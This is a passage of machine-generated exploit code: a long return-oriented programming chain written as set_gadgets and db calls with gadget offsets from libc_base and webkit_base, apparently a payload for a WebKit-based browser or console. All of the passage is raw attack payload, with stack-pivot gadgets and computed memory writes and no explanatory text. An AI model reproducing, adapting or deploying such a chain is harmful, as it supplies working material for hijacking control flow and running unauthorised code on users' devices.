libc_base+764760, //pop rsi
ropchain+304096, //L5936
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L5936:
db([0, 0]); // 0x0
set_gadgets([
ropchain+304120, //L5936+24
ropchain+305256, //L5931
libc_base+759608 //pop rax
]);
//L5937:
db([48, 0]); // 0x30
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+304208, //L5938
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5938:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5940:
db([4294967255, 4294967295]); // -0x29
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+304328, //L5943
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+304312, //L5941
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5941:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5943:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+304488, //L5947
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+304456, //L5945
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+304472, //L5946
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5944:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L5945:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5946:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5947:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+304544, //L5949
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L5949:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+304672, //L5951
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+304688, //L5952
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+304656, //L5950
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5950:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5951:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5952:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+304848, //L5956
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+304816, //L5954
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+304832, //L5955
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5953:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L5954:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5955:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5956:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+304904, //L5958
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L5958:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+305032, //L5960
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+305048, //L5961
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+305016, //L5959
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5959:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5960:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5961:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+305160, //L5962
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+305192, //L5964
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+305176, //L5963
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5962:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5963:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5964:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+782311, //pop rsp
ropchain+307648, //L5965
//L5931:
libc_base+764760, //pop rsi
ropchain+305296, //L5966
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5966:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5968:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+305416, //L5971
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+305400, //L5969
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5969:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5971:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+305592, //L5974
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+305608, //L5975
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+305560, //L5972
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+305576, //L5973
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5972:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5973:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5974:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5975:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+305704, //L5977
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+305688, //L5976
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5976:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5977:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5978:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5979:
db([5, 0]); // 0x5
set_gadget(libc_base+763368,); //pop rcx
//L5980:
db([5, 0]); // 0x5
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+305904, //L5982
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5982:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+305960, //L5983
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5983:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+306096, //L5987
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+306080, //L5986
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5985:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L5986:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5987:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+306232, //L5990
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+306264, //L5992
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+306216, //L5989
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5989:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5990:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5991:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5992:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+306376, //L5993+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+306368, //L5993
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L5993:
db([0, 0]); // 0x0
set_gadgets([
ropchain+306392, //L5993+24
ropchain+306424, //L5988
libc_base+759608 //pop rax
]);
//L5995:
db([65, 0]); // 0x41
set_gadgets([
libc_base+782311, //pop rsp
ropchain+306440, //L5994
//L5988:
libc_base+759608 //pop rax
]);
//L5996:
db([97, 0]); // 0x61
//L5994:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+306512, //L5997
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5997:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5999:
db([4294967255, 4294967295]); // -0x29
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+306632, //L6002
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+306616, //L6000
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6000:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6002:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+306792, //L6006
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+306760, //L6004
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+306776, //L6005
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6003:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L6004:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6005:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6006:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+306848, //L6008
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L6008:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+306976, //L6010
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+306992, //L6011
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+306960, //L6009
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6009:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6010:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6011:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+307152, //L6015
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+307120, //L6013
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+307136, //L6014
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6012:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L6013:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6014:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6015:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+307208, //L6017
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L6017:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+307336, //L6019
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+307352, //L6020
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+307320, //L6018
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6018:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6019:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6020:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+307464, //L6021
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+307496, //L6023
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+307480, //L6022
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6021:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6022:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6023:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L6024:
db([10, 0]); // 0xa
set_gadget(libc_base+763368,); //pop rcx
//L6025:
db([10, 0]); // 0xa
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
//L5965:
libc_base+764760, //pop rsi
ropchain+307760, //L6027
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+307776, //L6028
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+307744, //L6026
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6026:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6027:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6028:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+307936, //L6032
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+307904, //L6030
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+307920, //L6031
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6029:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L6030:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6031:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6032:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+307992, //L6034
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L6034:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+308120, //L6036
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+308136, //L6037
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+308104, //L6035
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6035:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6036:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6037:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+308232, //L6039
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+308216, //L6038
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6038:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6039:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+308328, //L6041
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L6040:
db([4294967264, 4294967295]); // -0x20
set_gadget(libc_base+759608,); //pop rax
//L6041:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+308408, //L6043
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6043:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+308464, //L6044
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6044:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+308544, //L6046
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6046:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6048:
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+308664, //L6051
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+308648, //L6049
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6049:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6051:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+308808, //L6054
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+308776, //L6052
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+308792, //L6053
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6052:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6053:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6054:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+308896, //L6056
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L6055:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L6056:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+308952, //L6057
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6057:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6059:
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+309032, //L6061
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6061:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+309136, //L6062
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+309152, //L6063
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6062:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6063:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+309240, //L6065
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6065:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+309296, //L6066
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6066:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+309368, //L6069
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6069:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+309424, //L6070
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6070:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+309512, //L6072
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6072:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6074:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+309632, //L6077
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+309616, //L6075
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6075:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6077:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+309776, //L6080
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+309744, //L6078
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+309760, //L6079
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6078:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6079:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6080:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+309856, //L6081
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6081:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6083:
db([64, 0]); // 0x40
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+309976, //L6086
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+309960, //L6084
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6084:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6086:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+310088, //L6087
webkit_base+660161, //mov [rsi], rax ; mov al, 1
